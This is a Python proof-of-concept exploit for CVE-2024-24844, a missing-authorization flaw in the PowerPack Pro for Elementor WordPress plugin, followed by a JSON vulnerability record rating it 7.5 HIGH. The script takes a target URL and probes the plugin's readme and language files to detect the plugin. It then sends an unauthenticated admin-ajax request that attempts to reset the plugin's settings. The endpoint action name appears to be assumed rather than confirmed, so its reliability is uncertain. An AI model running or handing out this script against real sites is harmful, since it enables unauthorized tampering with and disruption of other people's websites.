CVE-2024-24844

# CVE-2024-24844 PoC - PowerPack Pro for Elementor Unauthenticated Settings Reset # This PoC demonstrates the Missing Authorization vulnerability import requests import sys TARGET_URL = "https://example.com" # Replace with target URL def exploit_cve_2024_24844(): """ Exploit the missing authorization vulnerability in PowerPack Pro for Elementor to reset plugin settings without authentication. """ # Step 1: Identify the vulnerable AJAX endpoint ajax_endpoint = f"{TARGET_URL}/wp-admin/admin-ajax.php" # Step 2: Prepare the malicious request to reset plugin settings # The vulnerability exists because the plugin doesn't properly verify user permissions payload = { 'action': 'powerpack_reset_settings', # Vulnerable action 'settings_reset_nonce': '' # No nonce required due to missing validation } headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' } print("[*] Sending exploit request to reset plugin settings...") print(f"[*] Target: {ajax_endpoint}") try: # Step 3: Send the unauthenticated request response = requests.post(ajax_endpoint, data=payload, headers=headers, timeout=30) print(f"[*] Response Status: {response.status_code}") print(f"[*] Response Body: {response.text[:500]}") if response.status_code == 200: if 'success' in response.text.lower() or '1' in response.text: print("[+] Exploit successful! Plugin settings have been reset.") print("[+] The plugin has been restored to default configuration.") return True else: print("[-] Unexpected response. Plugin may not be vulnerable or already at default settings.") return False else: print(f"[-] Request failed with status code: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {str(e)}") return False def check_vulnerability(): """ Check if the target is running a vulnerable version of PowerPack Pro for Elementor. """ # Check plugin version via readme.txt or meta query version_urls = [ f"{TARGET_URL}/wp-content/plugins/powerpack-elements/readme.txt", f"{TARGET_URL}/wp-content/plugins/powerpack-elements/languages/powerpack-elements.pot" ] for url in version_urls: try: response = requests.get(url, timeout=10) if response.status_code == 200: print(f"[*] Found plugin file: {url}") return True except: continue return None if __name__ == "__main__": print("=" * 60) print("CVE-2024-24844 Exploit - PowerPack Pro for Elementor") print("Missing Authorization - Settings Reset") print("=" * 60) if len(sys.argv) > 1: TARGET_URL = sys.argv[1] print(f"[*] Target: {TARGET_URL}") check_vulnerability() exploit_cve_2024_24844() print("\n[*] Exploitation complete.")

{"cve": {"id": "CVE-2024-24844", "sourceIdentifier": "[email protected]", "published": "2025-12-23T12:15:44.557", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in IdeaBox Creations PowerPack Pro for Elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects PowerPack Pro for Elementor: from n/a through 2.10.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/wordpress/plugin/powerpack-elements/vulnerability/wordpress-powerpack-pro-for-elementor-plugin-2-10-6-unauthenticated-plugin-settings-reset-vulnerability?_s_id=cve", "source": "[email protected]"}]}}